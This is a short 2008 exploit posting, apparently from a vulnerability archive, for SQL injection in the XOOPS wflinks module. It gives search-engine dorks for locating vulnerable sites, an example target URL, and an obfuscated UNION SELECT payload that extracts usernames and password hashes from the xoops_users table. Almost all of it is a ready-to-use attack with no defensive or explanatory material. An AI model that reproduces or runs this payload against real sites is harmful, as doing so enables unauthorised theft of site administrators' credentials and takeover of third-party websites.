Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19195
HistoryFeb 20, 2008 - 12:00 a.m.

XOOPS Module wflinks SQL Injection(cid)

2008-02-2000:00:00
vulners.com
17

###############################################################

XOOPS Module wflinks SQL Injection(cid)

###############################################################

AUTHOR : S@BUN

HOME 1 : http://www.milw0rm.com/author/1334

MAİL : [email protected]

################################################################

DORK 1 : allinurl: modules/wflinks/viewcat.php

DORK 2 : allinurl: modules/wflinks

################################################################

example

http://xxxxxx.com/modules/wflinks/viewcat.php?cid= [exploit]

EXPLOIT :

-888888%2F%2A%2A%2Funion%2F%2A%2A%2Fselect//char(117,115,101,114,110,97,109,101,58),concat(uname,0x3a,pass)//from%2F%2A%2A%2Fxoops_users/*%20where%20admin%20pass%20

################################################################

S@BUN i AM NOT HACKER S@BUN

################################################################